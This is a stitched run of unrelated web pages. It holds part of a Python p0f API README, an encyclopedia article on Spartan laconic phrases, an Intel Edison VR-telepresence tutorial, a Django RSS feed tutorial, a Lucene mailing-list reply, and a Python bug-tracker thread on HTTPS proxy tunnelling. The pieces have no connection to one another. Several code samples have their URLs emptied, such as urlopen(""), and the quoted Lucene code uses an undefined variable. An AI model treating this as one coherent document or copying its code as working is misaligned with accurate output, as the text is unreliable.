    # p0f returned invalid constant values. Maybe the API has changed?
    print e

if data:
    print "First seen:", data["first_seen"]
    print "Last seen:", data["last_seen"]

Django integration

See examples/django_models.py for a complete Django model of the data returned by p0f. Django middleware is available in p0f.django.middleware. To use it, add P0FSOCKET = "path/to/p0f_unix_socket" to your project's settings.py, and p0f.django.middleware.P0fMiddleware to MIDDLEWARE_CLASSES. The middleware adds a p0f attribute to all incoming requests. request.p0f is None if the connection to p0f failed or p0f did not return data for the remote IP address.

Data fields

Parts of these descriptions are shamelessly copied from :

By default, the following fields are parsed:

- datetime: first_seen
- datetime: last_seen
- timedelta: uptime
- int: uptime_sec
- timedelta: up_mod_days
- datetime: last_nat
- datetime: last_chg

Additionally, bad_sw and os_match_q are validated. ValueError is raised if an incorrect value is encountered. For all empty fields, None is used instead of empty strings or constants:

- uptime_min
- uptime_sec
- uptime
- up_mod_days
- last_nat
- last_chg
- distance
- bad_sw
- os_name
- os_flavor
- http_flavor
- link_type
- language

This parsing and validation can be disabled with p0f.get_info("192.168.0.1", True)

Full descriptions of the fields:

- int: first_seen - unix time (seconds) of first observation of the host.
- int: last_seen - unix time (seconds) of most recent traffic.
- int: total_conn - total number of connections seen.
- int: uptime_min - calculated system uptime, in minutes. Zero if not known.
- int: up_mod_days - uptime wrap-around interval, in days.
- int: last_nat - time of the most recent detection of IP sharing (NAT, load balancing, proxying). Zero if never detected.
- int: last_chg - time of the most recent individual OS mismatch (e.g., due to multiboot or IP reuse).
- int: distance - system distance (derived from TTL; -1 if no data).
- int: bad_sw - p0f thinks the User-Agent or Server strings aren't accurate. The value of 1 means OS difference (possibly due to proxying), while 2 means an outright mismatch. NOTE: If User-Agent is not present at all, this value stays at 0.
- int: os_match_q - OS match quality: 0 for a normal match; 1 for fuzzy (e.g., TTL or DF difference); 2 for a generic signature; and 3 for both.
- string: os_name - name of the most recent positively matched OS. If the OS is not known, os_name is an empty string. NOTE: If the host is first seen using a known system and then switches to an unknown one, this field is not reset.
- string: os_flavor - OS version. May be empty if no data.
- string: http_name - most recent positively identified HTTP application (e.g. 'Firefox').
- string: http_flavor - version of the HTTP application, if any.
- string: link_type - network link type, if recognized.
- string: language - system language, if recognized.

- Author: Olli Jarva
- Keywords: p0f fingerprinting API client
- License: MIT
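The parsing rules described above (unix seconds become datetime objects, uptime becomes a timedelta, zero sentinels become None, os_match_q is range-checked) can be sketched as a standalone helper. This is a hypothetical illustration of the behaviour, not the library's actual code, and the field subset is trimmed for brevity:

```python
from datetime import datetime, timedelta

def parse_p0f_fields(raw):
    """Convert raw p0f integer fields into richer Python types.

    Hypothetical helper mirroring the documented parsing rules:
    timestamps -> datetime, uptime minutes -> timedelta,
    zero sentinel values -> None, os_match_q validated.
    """
    data = dict(raw)
    for key in ("first_seen", "last_seen"):
        data[key] = datetime.utcfromtimestamp(raw[key])
    data["uptime"] = timedelta(minutes=raw["uptime_min"]) if raw["uptime_min"] else None
    data["last_nat"] = datetime.utcfromtimestamp(raw["last_nat"]) if raw["last_nat"] else None
    if raw["os_match_q"] not in (0, 1, 2, 3):
        raise ValueError("unknown os_match_q value")
    return data
```

Passing `True` as the second argument to get_info, as noted above, skips this kind of post-processing and returns the raw integers.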
https://pypi.python.org/pypi/p0f/0.1.0
Laconic phrase

A laconic phrase or laconism is a concise or terse statement, especially a blunt and elliptical rejoinder.[1][2] It is named after Laconia, the region of Greece including the city of Sparta, whose inhabitants had a reputation for verbal austerity and were famous for their blunt and often pithy remarks.

Uses

A laconic phrase may be used for efficiency (as in military jargon), for philosophical reasons (especially among thinkers who believe in minimalism, such as Stoics), or to better deflate a pompous individual (a famous example being at the Battle of Thermopylae).

In humour

The Spartans were especially famous for their dry, understated wit, which is now known as "laconic humor."[note 1] This can be contrasted with the "Attic salt" or "Attic wit," the refined, poignant, delicate humour of Sparta's chief rival Athens.

History

Spartans focused less than other Greeks on the development of education, arts, and literature.[5] Some view this as having contributed to the characteristically blunt Laconian speech. However, Socrates, in Plato's dialogue Protagoras, argued that the Spartans concealed a genuine love of wisdom behind their blunt manner.[6][note 2] Socrates was known to have admired Spartan laws,[7] as did many other Athenians,[8] but modern scholars have doubted the seriousness of his attribution of a secret love of philosophy to Spartans.[9][10]

Examples

Spartan

- A witticism attributed to Lycurgus, the legendary lawgiver of Sparta, was a response to a proposal to set up a democracy there: "Begin with your own family."[11]
- On another occasion, Lycurgus was reportedly asked the reason for the less-than-extravagant size of Sparta's sacrifices to the gods.
He replied, "So that we may always have something to offer."[11]
- When he was consulted on how Spartans might best forestall invasion of their homeland, Lycurgus advised, "By remaining poor, and each man not desiring to possess more than his fellow."[11]
- When asked whether it would be prudent to build a defensive wall enclosing the city, Lycurgus answered, "A city is well-fortified which has a wall of men instead of brick."[11]
- Responding to a visitor who questioned why they put their fields in the hands of the helots rather than cultivate them themselves, Anaxandridas explained, "It was by not taking care of the fields, but of ourselves, that we acquired those fields."[12]
- King Demaratus, being annoyed by someone pestering him with a question concerning who the most exemplary Spartan was, answered, "He that is least like you."[11]
- On her husband Leonidas's departure for battle with the Persians at Thermopylae, Gorgo, Queen of Sparta, asked what she should do. He advised her: "Marry a good man and bear good children."[13][14]
- When Leonidas was in charge of guarding the narrow mountain pass at Thermopylae with just 7,000 Greeks and Xerxes demanded that the Greeks lay down their arms, Leonidas answered, "Come and take them" (Μολὼν λαβέ).[15] The phrase was later adopted as a motto.[16]
- Told that the Persian arrows would be so numerous as to blot out the sun, the Spartan Dienekes replied, "So much the better, we'll fight in the shade".[17][18][19]
- When asked by a woman from Attica, "Why are you Spartan women the only ones who can rule men?", Gorgo replied, "Because we are also the only ones who give birth to men."[11][20]
- Polycratidas was one of several Spartans sent on a diplomatic mission to some Persian generals, and being asked whether they came in a private or a public capacity, answered, "If we succeed, public; if not, private."[11]
- Following the disastrous sea battle of Cyzicus, the admiral Mindaros' first mate dispatched a succinct distress signal to Sparta.
The message was intercepted by the Athenians and was recorded by Xenophon in his Hellenica: "Ships gone; Mindarus dead; the men starving; at our wits' end what to do".[22][23]
- A visitor to Sparta expressed surprise at the plain clothing of King Agesilaus II and other Spartans. Agesilaus remarked, "From this mode of life we reap a harvest of liberty."[24]
- When asked whether bravery or justice was a more important virtue, Agesilaus explained, "There is no use for bravery unless justice is present, and no need for bravery if all men are just."[25]
- After Agesilaus was wounded in one of his many battles against Thebes, Antalcidas remonstrated, "The Thebans pay you well for having taught them to fight, which they were neither willing nor able to do before."[11][note 4]
- Nearing death, Agesilaus was asked if he wanted a statue erected in his honor. He declined, saying, "If I have done anything noble, that is a sufficient memorial; if I have not, all the statues in the world will not preserve my memory."[27]
- When Philip II of Macedon threatened to raze Sparta if he entered Laconia, the Spartan ephors sent back a one-word reply: "If" (αἴκα).[28] Subsequently neither Philip nor his son Alexander the Great attempted to capture the city.
- When someone from Argos pointed out that Spartans were susceptible to being corrupted by foreign travel, Eudamidas replied, "But you, when you come to Sparta, do not become worse, but better."[30]
- Demetrius I of Macedon was offended when the Spartans sent his court a single envoy, and exclaimed angrily, "What! Have the Lacedaemonians sent no more than one ambassador?" The Spartan responded, "Aye, one ambassador to one king."[31]
- After being invited to dine at a public table, the sophist Hecataeus was criticized for failing to utter a single word during the entire meal. Archidamidas answered in his defense, "He who knows how to speak, knows also when."[11]
- Spartan mothers or wives gave a departing warrior his shield with the words: "With it or on it!" (Greek: Ἢ τὰν ἢ ἐπὶ τᾶς!
E tan e epi tas!), implying that he should return (victoriously) with his shield, or (his dead body) upon it, but by no means after saving himself by throwing away his heavy shield and fleeing.[32][33]
- The king of Pontus engaged a Spartan cook to prepare their famous black broth for him, but found it distasteful. The cook explained, "To relish this dish, one must first bathe in the Eurotas."[11]
- Upon being asked to go listen to a person who could perfectly imitate a nightingale, a Spartan answered, "I have heard the nightingale itself."[34]
- When an Athenian accused Spartans of being ignorant, the Spartan Pleistoanax agreed: "What you say is true. We alone of all the Greeks have learned none of your evil ways."[11]

Other historical examples

- A traveler from Sybaris, a city in southern Italy (which gave rise to the word sybarite) infamous in the ancient world for its luxury and gluttony, was invited to eat in a Spartan mess hall and taste their black broth. Disgusted, he remarked, "No wonder Spartans are the bravest of men. Anyone in their right mind would rather die a thousand times than live like this."[36]
- When news of the death of Philip II reached Athens in 336 BC, the strategos Phocion banned all celebratory sacrifice, saying: "The army which defeated us at Chaeronea has lost just one man."[37]
- The heavy price of defeating the Romans in the Battle of Asculum (279 BC) prompted Pyrrhus to respond to an offer of congratulations with "If we win one more battle we will be doomed" ("One more such victory and the cause is lost"; in Greek: Ἂν ἔτι μίαν μάχην νικήσωμεν, ἀπολώλαμεν Án éti mían máchēn nikḗsōmen, apolṓlamen).[38]
- After the execution of the Catiline conspirators in 62 BC, Cicero announced "Vixerunt" – "They have lived."
(This was actually a formulaic expression that avoided direct mention of death to forestall ill fortune.)[39]
- Julius Caesar memorialized his swift victory over King Pharnaces II of Pontus in the Battle of Zela in 47 BC with a message to the Roman Senate consisting of the words "Veni, vidi, vici" ("I came, I saw, I conquered").[41]
- According to a legend recorded in the Primary Chronicle for year 6472, Sviatoslav I of Kiev (circa 962–972 AD) sent a message to the Vyatich rulers consisting of a single phrase: "I come at you!" (Old East Slavic: "Иду на вы!" Idu na vi!).[42] The chronicler may have wished to contrast Sviatoslav's open declaration of war with the stealthy tactics employed by many other early medieval conquerors. This phrase is used in modern Russian to denote an unequivocal declaration of one's intentions.
- In 1809, during the second siege of Saragossa, the French demanded the city's surrender with the message "Peace and Surrender" ("Paz y capitulación"). General Palafox's reply was "War and knife" ("Guerra y cuchillo", often mistranslated as "War to the Knife").
- When asked to surrender the Imperial Guard during the Battle of Waterloo, General Cambronne is recorded as replying: La Garde meurt, elle ne se rend pas ("The Guard dies, it does not surrender"). Some sources also record his response as the single word Merde (literally "shit", but it can also be roughly translated as "Go to Hell").[43] Merde is still euphemistically referred to in French as le mot de Cambronne, Cambronne's word.
- During the early 20th century struggle for central Arabia between the families of Al Rashid and Al Saud, Shaykh Abdul Aziz Al Rashid wrote to King Abdul Aziz Al Saud suggesting that rather than having their armies battle, the two leaders should settle the matter through single combat.
The king replied with a one-line letter: "From Abdul Aziz the living to Abdul Aziz the dead."[citation needed]
- In 1843, after annexing the then-Indian village Miani of Sindh against orders, a (likely apocryphal) story tells that British General Sir Charles Napier sent home a one-word telegram, "Peccavi", making use of its Latin meaning "I have sinned" and the heterograph "I have Sindh."[44]
- A similar (possibly apocryphal) story has Lord Dalhousie annexing Oudh and sending a one-word telegram, 'Vovi', translated as 'I have vowed' (Oudh and vowed are heterographs).[45]
- Victor Hugo, away from Paris when Les Misérables was published, reportedly telegraphed his publisher the single character "?" to ask how the book was selling; the publisher replied "!".[46][47]
- Shortly after taking command of the French 9th Army during the early stages of the First World War, General Ferdinand Foch summarised his situation with the words "My center is giving way, my right is in retreat. Situation excellent. I attack."[48]
- On October 27, 1917, violinist Mischa Elman and pianist Leopold Godowsky listened in Carnegie Hall as sixteen-year-old violin prodigy Jascha Heifetz gave his first U.S. performance. At intermission, Elman wiped his brow and remarked "It's awfully hot in here", to which Godowsky retorted, "Not for pianists!"[49]
- On October 28, 1918, the Austro-Hungarian emperor Charles I of Austria tried to persuade the Slovene leader Anton Korošec not to join an independent Yugoslav State by offering to establish an autonomous United Slovenia within the Habsburg Monarchy. Korošec replied in German: Es ist zu spät, Majestät ("It is too late, your Majesty") and then, according to his own account, slowly left the room. The State of Slovenes, Croats and Serbs was declared the next day with Korošec as its de facto leader.[citation needed]
- Nobel Prize-winning British physicist Paul Dirac was notoriously taciturn.[note 5] During the question period after a lecture he gave at the University of Toronto, a member of the audience remarked that he hadn't understood part of a derivation. There followed a long and increasingly awkward silence.
When the host finally prodded him to respond, Dirac simply said, "That was a statement, not a question."[51]
- Austrian physicist Wolfgang Pauli (also a Nobel laureate), known as the conscience of the physics world for his colorful objections to incorrect or sloppy thinking, was shown a young physicist's paper and lamented, "[This is so bad,] it is not even wrong."[52]
- During the December 1944 Battle of Bastogne, part of the Battle of the Bulge, the 101st Airborne in and around Bastogne was surrounded by enemy forces. The Germans sent the Americans a party of envoys with an ultimatum: surrender or face "certain annihilation". The German officer in charge was perplexed when General Anthony McAuliffe replied with one word: "Nuts!"[note 6]
- Surrounded at the Chosin Reservoir in 1950, U.S. Marine Colonel Lewis "Chesty" Puller reportedly remarked, "We're surrounded. That simplifies the problem."[56] He also reportedly said, "Great. Now we can shoot at those bastards from every direction."

Notes

- ↑ Australia is often cited as a modern stronghold of such humor.[3][4]
- ↑ under Persian dominion. frequently with the same opponents, lest by doing so it should school them in military arts. This transgression led to the downfall of Sparta after its defeat by Thebes.
- ↑ This began early. When Dirac was a child, his authoritarian father, a teacher of French, enforced a rule that Dirac speak to him only in French, as a device to encourage him to learn the language. But since young Dirac had difficulty expressing himself in French, the result was he spoke very little.
- ↑ When the German officer had to ask, "Is the reply negative or affirmative?", it was explained to him as being equivalent to "Go to hell."[55]

References

- ↑ Merriam-Webster's Dictionary of Synonyms, 1984, s.v. 'concise', p. 172.
- ↑ Henry Percy Smith, Synonyms Discriminated (1904), p. 541.
- ↑ Willbanks, R. (1991). Australian Voices: Writers and Their Work. University of Texas Press. p. 117. ISBN 978-0-292-78558-8. OCLC 23220737.
- ↑ Bell, S.; Bell, K.; Byrne, R. (2013).
"Australian Humour: What Makes Aussies Laugh?". Australian Tales. Australian-Information-Stories.com. Archived from the original on 2013-01-22. Retrieved 2014-08-30.
- ↑ Plato, Hippias Major 285b-d.
- ↑ Protagoras 342b, d-e, from the translation given at the end of the section on Lycurgus in e-classics.com.
- ↑ Plato, Crito 52e.
- ↑ Plato, Republic 544c.
- ↑ Paul Cartledge (2003). Spartan Reflections. University of California Press. p. 85. ISBN 978-0-520-23124-5. Retrieved 13 December 2012.
- ↑ Plutarch, Life of Lycurgus.
- ↑ Plutarch, Apophthegmata Laconica, 210a.
- ↑ Plutarch, Apophthegmata Laconica, 213c.
- ↑ Plutarch, Parallel Lives, "Agesilaus", 15.6.123.
- ↑ Plutarch, Apophthegmata Laconica, 215a.
- ↑ Plutarch, "De garrulitate", 17.
- ↑ William S. Walsh (1892). Handy-Book of Literary Curiosities. Philadelphia: J.B. Lippincott Co. p. 600.
- ↑ Writing, Not (2007-01-18). "The Shortest Complete Sentence in the English Language". Humanities 360. Helium Publishing. Archived from the original on 2014-06-13. Retrieved 2014-06-13.
- ↑ Neiberg, Michael (2003). Foch: Supreme Allied Commander in the Great War. Brassey's. ISBN 1-57488-672-X.
- ↑ Nicholas, Jeremy. "Wit and Wisdom". Archived from the original on 2008-01-07. Retrieved 2007-10-02.
- ↑ Peierls, R. (1960). "Wolfgang Ernst Pauli, 1900-1958". Biographical Memoirs of Fellows of the Royal Society. Royal Society (Great Britain).
- ↑ S.L.A. Marshall, Bastogne: The First Eight Days, Chapter 14, detailing and sourcing the incident.
- ↑ Russ, Martin (1999). Breakout – The Chosin Reservoir Campaign, Korea, 1950. Penguin Books. p. 230. ISBN 0-14-029259-4.
https://infogalactic.com/info/Laconic
This is a project we worked on at Intel IoT Roadshow 2016. The Intel Edison compute chip is a rather powerful board with built-in WiFi and bluetooth capabilities. This makes it perfect for some slightly more intensive IoT applications. I used a Google Cardboard and mapped the user's head movements to a camera mounted on a servo motor, making it look like a full 360 degree video.

Step 1: On the Phone

I used Trinus VR to display a camera feed from my laptop to my phone. Trinus also translates head movement to mouse pointer movement, which we can then capture. Trinus requires a mobile app that is compatible with Google Cardboard, and a desktop app. Download and install them.

Step 2: On Your PC

Since Trinus moved the mouse pointer based on head rotation, I could capture this mouse movement and use it to send requests to the Edison. I did this with a little Python script that uses the win32 api to capture the mouse position every few milliseconds and make a GET request to the nodejs server running on the Edison. Here is the code:

import win32api
import time
import urllib2

running = True
width = win32api.GetSystemMetrics(0)/2
height = win32api.GetSystemMetrics(1)/2

while(running):
    x, y = win32api.GetCursorPos()
    win32api.SetCursorPos((width, height))
    if(x-width >= 100 or y-height >= 100):
        print "Vert: %s, Hor: %s" % (x-width, y-height);
    time.sleep(0.1)
    if(x-width > 5):
        urllib2.urlopen("")
    if(x-width < -5):
        urllib2.urlopen("")

Step 3: On the Edison

The Intel Edison compute chip runs a full linux distro called Yocto. It also comes with Nodejs as well as a bunch of preinstalled libraries for interacting with the hardware ports.
Code:

var express = require("express")
var app = express()
var mraa = require("mraa")
var pwm = new mraa.Pwm(3)
var groveSensor = require('jsupm_grove');
var led = new groveSensor.GroveLed(6);
var led2 = new groveSensor.GroveLed(5);

pwm.enable(true);
pwm.period_us(2000);
var value = 30;
//pwm.write(value);

app.get('/', function (req, res) {
    res.send('Hello World!');
});

app.get('/right', function (req, res){
    pwm.write(0);
    setTimeout(function(){pwm.write(3);console.log("IT IS DONE");}, 100);
    led2.on();
    setTimeout(function(){led2.off();}, 100);
    res.send('ryt');
})

app.get('/left', function(req, res){
    console.log('hit')
    res.send('left');
    led.on();
    setTimeout(function(){led.off();}, 100);
    //insert action here
})

app.get('/stop', function (req, res){
    pwm.write(5);
    // setTimeout(function(){pwm.write(3);console.log("IT IS DONE");}, 100);
    res.send('stoppin');
})

var server = app.listen(8081, function () {
    var host = server.address().address
    var port = server.address().port
    console.log("Example app listening at", host, port)
})

Stick this in a javascript file and run it. I also used a Grove starter kit to power two LEDs and a servo motor that had the webcam mounted on it. The webcam feed is then streamed and can be accessed from any browser. This repo has a great way to implement the stream.
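The mouse-delta thresholds in the step 2 capture script can be factored into a pure function, which makes the mapping from head movement to servo command easy to reason about and test. This is a hypothetical refactoring for illustration, not code from the project:

```python
def head_to_command(x, center_x, dead_zone=5):
    """Map a captured mouse x-position to a servo command.

    Mirrors the thresholds in the capture script above: movements
    within the dead zone are ignored; otherwise pan right or left.
    """
    delta = x - center_x
    if delta > dead_zone:
        return "right"
    if delta < -dead_zone:
        return "left"
    return None
```

The capture loop would then just issue a request to the matching /right or /left endpoint whenever the function returns a non-None command.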
https://www.instructables.com/id/Virtual-Reality-Telepresence-With-Intel-Edison/
In previous articles, we learned how to create a sitemap for a Django website. A valid sitemap increases your website's search engine ranking, so it is good for search engine optimization. Similarly, adding a robots.txt file is good for your website: it tells crawlers which pages to crawl and which pages not to crawl for indexing. In this article, we will see how to generate an RSS feed on your Django website. An RSS feed helps readers keep up with their favorite blogs, news sites, and other websites; RSS allows the content and new updates to come to the reader. Generally, you use RSS to syndicate or subscribe to the feed of a website, blog or almost any media content that is updated online.

Create a file in your app directory, parallel to the urls.py file, and name it feeds.py. Paste the code below into it. In the sample below, we are fetching posts/articles from the database of pythoncircle.com. We have implemented four methods: items, item_title, item_description and item_link. The code has been updated with comments.

from django.contrib.syndication.views import Feed
from django.urls import reverse

class LatestEntriesFeed(Feed):
    title = "PythonCircle.com: New article for Python programmers every week"
    link = "/feed/"
    description = "Updates on changes and additions to python articles on pythoncircle.com."

    # return 10 recently created/updated posts
    def items(self):
        return get_recent_updated_posts(number_of_posts=10)

    def item_title(self, item):
        return item.title

    # return a short description of the article
    def item_description(self, item):
        return item.description

    # create and return the article URL
    def item_link(self, item):
        return reverse('appname:index', args=(item.post_id,))

Now in your project's urls.py file (not in any app's urls.py file) add the code below.

from appname.feeds import LatestEntriesFeed

# add feeds path
urlpatterns += [
    path(r'feed/', LatestEntriesFeed()),
]

Restart/reload your Django app and go to pythoncircle.com/feed/ or localhost:8000/feed/. You can then check whether the generated RSS feed is valid.
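Under the hood, the Feed class serializes the channel metadata and each item into RSS XML. A hand-rolled sketch of that output shape, offered purely for illustration (this is not Django's implementation, and the helper name is invented):

```python
import xml.etree.ElementTree as ET

def build_rss(title, link, description, items):
    """Build a minimal RSS 2.0 document.

    items is an iterable of (title, link, description) tuples,
    analogous to what item_title/item_link/item_description return.
    """
    rss = ET.Element("rss", version="2.0")
    channel = ET.SubElement(rss, "channel")
    for tag, text in (("title", title), ("link", link), ("description", description)):
        ET.SubElement(channel, tag).text = text
    for item_title, item_link, item_desc in items:
        item = ET.SubElement(channel, "item")
        ET.SubElement(item, "title").text = item_title
        ET.SubElement(item, "link").text = item_link
        ET.SubElement(item, "description").text = item_desc
    return ET.tostring(rss, encoding="unicode")
```

Seeing the target XML makes it clearer why the Feed class only asks you for per-item titles, descriptions and links: everything else is boilerplate it fills in for you.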
https://pythoncircle.com/post/687/how-to-generate-atomrss-feed-for-django-website/
Hi

If you want to use a REST service for your search, then my advice would be to use Solr, as it has built-in REST API functionality. If you want to use Lucene, then below are my comments:

1. In the doSearch function, you are creating the reader object. If this call is invoked for every query, it will be very expensive. You need to create it once globally and reopen it if the index is modified. It's better to use SearcherManager.

Regards
Aditya - Search from 1 Million open source projects.

On Thu, Sep 5, 2013 at 6:46 AM, David Miranda <david.b.miranda@gmail.com>wrote:

> Hi,
>
> I'm developing a web application, that contains a REST service in the
> Tomcat, that receives several requests per second.
> The REST requests do research in a Lucene index, to do this i use the
> IndexSearch.
>
> My questions are:
> - There are concurrency problems in multiple research?
> - What the best design pattern to do this?
>
> public class IndexResearch(){
>
>     private static int MAX_HITS = 500;
>     private static String DIRECTORY = "indexdir";
>     private IndexSearcher searcher;
>     private StandardAnalyzer analyzer;
>
>     public IndexResearch(){
>     }
>
>     public String doSearch(String text){
>         analyzer = new StandardAnalyzer(Version.LUCENE_43);
>         topic = QueryParser.escape(topic);
>         Query q = new QueryParser(Version.LUCENE_43, "field", analyzer).parse(text);
>         File indexDirectory = new File(DIRECTORY);
>         IndexReader reader;
>         reader = DirectoryReader.open(FSDirectory.open(indexDirectory));
>         searcher = new IndexSearcher(reader);
>         /*more code*/
>     }
> }
>
> Can I create, in the servlet, one object of this class per client request
> (Is that the best design pattern)?
>
> Thanks in advance.
http://mail-archives.us.apache.org/mod_mbox/lucene-java-user/201309.mbox/%3CCAE9W93MP2SoT=ib+v4XxDLEsrn8R4DMyP5s3ZFRAj9tcd=AkGw@mail.gmail.com%3E
Created on 2010-01-25 04:34 by cameron, last changed 2014-05-19 21:59 by orsenthil. This issue is now closed.

I'm trying to do HTTPS via a proxy in Python 2.6.4 (which is supposed to incorporate this fix from issue 1424152). While trying to debug this starting from the suds library, I've been reading httplib.py and urllib2.py to figure out what's going wrong, and found myself around line 687 of httplib.py at the _tunnel() function.

_tunnel() is broken because _set_hostport() has side effects. _tunnel() starts with:

self._set_hostport(self._tunnel_host, self._tunnel_port)

to arrange that the subsequent connection is made to the proxy host and port, and that is in itself ok. However, _set_hostport() sets the .host and .port attributes in the HTTPConnection object. The next action _tunnel() takes is to send the CONNECT HTTP command, filling in the endpoint host and port from self.host and self.port. But these values have been overwritten by the preceding _set_hostport() call, and so we ask the proxy to connect to itself.

It seems to me that _tunnel() should be grabbing the original host and port before calling _set_hostport(), thus:

ohost, oport = self.host, self.port
self._set_hostport(self._tunnel_host, self._tunnel_port)
self.send("CONNECT %s:%d HTTP/1.0\r\n\r\n" % (ohost, oport))

In fact the situation seems even worse: _tunnel() calls send(), send() calls connect(), and connect() calls _tunnel() in an infinite regress.

- Cameron Simpson

Amendment: regarding the infinite regress, it looks like there will not be a recursion if the caller leaps straight to the .connect() method. However, if they do that then the call to _tunnel() from within connect() will happen _after_ the socket is made directly to the origin host, not via the proxy. So the behaviour seems incorrect then also; it looks very much like _tunnel() must always be called before the real socket connection is established, and .connect() calls _tunnel() afterwards, not before.
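The fix sketched in the report boils down to capturing the origin endpoint before _set_hostport() repoints .host/.port at the proxy. The CONNECT line itself can be illustrated with a tiny standalone helper (hypothetical, mirroring the snippet in the report rather than httplib's actual code):

```python
def build_connect_request(origin_host, origin_port):
    """Build the CONNECT line a client sends to an HTTP proxy.

    The origin endpoint must be captured *before* the connection
    object's host/port attributes are repointed at the proxy;
    otherwise the proxy is asked to connect to itself.
    """
    return "CONNECT %s:%d HTTP/1.0\r\n\r\n" % (origin_host, origin_port)
```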
It's looking like I have my idea of .host versus ._tunnel_host swapped. I think things are still buggy, but my interpretation of the bug is wrong or misleading. I gather that after _set_tunnel(), .host is the proxy host and ._tunnel_host is the original target host. I'll follow up here in a bit when I've better characterised the problem. I think I'm letting urllib2's complicated state stuff confuse me too...

Well, I've established a few things:

- I mischaracterised this issue
- httplib's _set_tunnel() is really meant to be called from urllib2, because using it directly with httplib is totally counterintuitive
- a bare urllib2 setup fails with its own bug

To the first item: _tunnel() feels really fragile with that recursion issue, though it doesn't recurse when called from urllib2.

For the second, here's my test script using httplib:

H = httplib.HTTPSConnection("localhost", 3128)
print H
H._set_tunnel("localhost", 443)
H.request("GET", "/boguspath")
os.system("lsof -p %d | grep IPv4" % (os.getpid(),))
R = H.getresponse()
print R.status, R.reason

As you can see, one builds the HTTPSConnection object with the proxy's details instead of those of the target URL, and then puts the target URL details in with _set_tunnel(). Am I alone in finding this strange?

For the third, my test code is this:

U = urllib2.Request('')
U.set_proxy('localhost:3128', 'https')
f = urllib2.urlopen(R)
print f.read()

which fails like this:

Traceback (most recent call last):
  File "thttp.py", line 15, in <module>
    f = urllib2.urlopen(R)
  File "/opt/python-2.6.4/lib/python2.6/urllib2.py", line 131, in urlopen
    return _opener.open(url, data, timeout)
  File "/opt/python-2.6.4/lib/python2.6/urllib2.py", line 395, in open
    protocol = req.get_type()
AttributeError: HTTPResponse instance has no attribute 'get_type'

The line numbers are slightly off because I've got some debugging statements in there.

Finally, I flat out do not understand urllib2's set_proxy() method:

def set_proxy(self, host, type):
    if self.type == 'https' and not self._tunnel_host:
        self._tunnel_host = self.host
    else:
        self.type = type
        self.__r_host = self.__original
    self.host = host

When my code calls set_proxy, self.type is None. Now, I had naively expected the first branch to be the only branch. Could someone explain what's happening here, and what is meant to happen? I'm thinking that this bug may turn into a doc fix instead of a behaviour fix, but I'm finding it surprisingly hard to know how urllib2 is supposed to be used.
Finally, I flat out do not understand urllib2's set_proxy() method:

    def set_proxy(self, host, type):
        if self.type == 'https' and not self._tunnel_host:
            self._tunnel_host = self.host
        else:
            self.type = type
            self.__r_host = self.__original
        self.host = host

When my code calls set_proxy, self.type is None. Now, I had naively expected the first branch to be the only branch. Could someone explain what's happening here, and what is meant to happen? I'm thinking that this bug may turn into a doc fix instead of a behaviour fix, but I'm finding it surprisingly hard to know how urllib2 is supposed to be used.

As you noticed, the _set_tunnel method is a private method not intended to be used directly. It's used by urllib2 when https through a proxy is required. urllib2 works like this: it reads the HTTPS_PROXY environment variable (in turn it includes HTTPSProxyHandler and HTTPSProxyAuthenticationHandler) and then tries to do a urlopen on an https:// url or a request object through the tunnel, doing a CONNECT instead of a GET. How do you think the docs can be improved? If you have any suggestions please upload a patch. Thanks.

Well, following your description I've backed out my urllib2 test case to this:

    f = urllib2.urlopen('')
    os.system("lsof -p %d | grep IPv4" % (os.getpid(),))
    f = urllib2.urlopen(R)
    print f.read()

and it happily runs HTTPS through the proxy if I set the https_proxy envvar. So it's all well and good for the "just do what the environment suggests" use case. However, my older test:

    U = urllib2.Request('')
    U.set_proxy('localhost:3128', 'https')
    f = urllib2.urlopen(R)
    print f.read()

still blows up with:

    File "/opt/python-2.6.4/lib/python2.6/urllib2.py", line 381, in open
        protocol = req.get_type()
    AttributeError: HTTPResponse instance has no attribute 'get_type'

Now, this is the use case for "I have a custom proxy setup for this activity". It seems a little odd that "req" above is an HTTPResponse instead of a Request, and that may be why there's no .get_type() method available.
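The supported route the maintainer describes, installing a proxy handler rather than calling Request.set_proxy() by hand, can be made explicit. A sketch in Python 3's urllib.request spelling (urllib2 in Python 2); the proxy URL is a placeholder and the actual fetch is commented out since it needs a live proxy:

```python
# Explicit proxy configuration via ProxyHandler, the documented
# alternative to a bare Request.set_proxy() call.  Proxy address is
# a placeholder.
import urllib.request

proxy_handler = urllib.request.ProxyHandler({"https": "http://localhost:3128"})
opener = urllib.request.build_opener(proxy_handler)
# f = opener.open("https://www.example.com/")  # tunnels via CONNECT
# print(f.read())
```

This bypasses the environment-variable lookup entirely, which is what the "custom proxy setup for this activity" use case needs.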
I also see nothing obviously wrong with my set_proxy() call above based on the docs for the .set_proxy() method, though obviously it fails. I think what may be needed is a small expansion of the section in the Examples area on proxies. There's a description of the use of the *_proxy envvars there (and not elsewhere, which seems wrong) and an example of providing a proxy Handler. An additional example with a functioning use of a bare .set_proxy() might help.

Cameron, could you provide a patch for this?

Ok, I have attached a patch that should fix the issue.

New patch revision, this time includes unit tests.

I've updated the patch again to fix a problem with HTTPSConnection.

Rebased patch on current tip.

A few comments:
- Your docstring for set_tunnel claims the method sends CONNECT when it in fact doesn't touch the network at all.
- Instead of 3 parallel arrays for tunnel information, it would be better to have a TunnelInfo class to contain host/port/headers (perhaps a namedtuple?).

Thanks for the review! I've attached an updated patch.

An update to the set_tunnel library documentation is being discussed in issue 11448. I'm not sure how to best handle the overlap. Maybe the best way is to first deal with issue 11448, and then add the changes resulting from this issue?

Hmm. I think I found another problem... please wait for another patch revision.

Ok, I've attached yet another patch revision. This revision is less complex, because it gets rid of the ability to set up chains of tunnels. The only reason that I put that in was to preserve backward compatibility -- but upon reviewing the old implementation again, I found out that this actually did not work in the past either.

Refreshed patch.

I am reviewing this patch right now and you will see my action soon. It is complete and I am reviewing to validate the technical details/fix. Thanks for the patch, Nikolaus.
I verified the patch and this indeed corrects a nasty bug in sending a wrong header when doing a lower-level HTTPSConnection to a proxy and set_tunnel (bad term) to the end host. I was worried as to why we did not observe this earlier, and it seems to me that the advertised way to do HTTPS CONNECT is via a Proxy Handler or urllib.request; when doing it via a ProxyHandler, these weirdly named actions (set_tunnel) happen underneath, but the skip_host bit is set as we got headers from the higher-level method, and the host header is carried transparently to the tunnel connection request, and thus we escaped this. The patch fixes the problem and cleans up a bit. Thanks for that, Nikolaus. This code (http/client.py) will require more attention beyond this bug too.

New changeset 39ee3286d187 by Senthil Kumaran in branch '3.4': Issue #7776: Fix ``Host:'' header and reconnection when using http.client.HTTPConnection.set_tunnel().
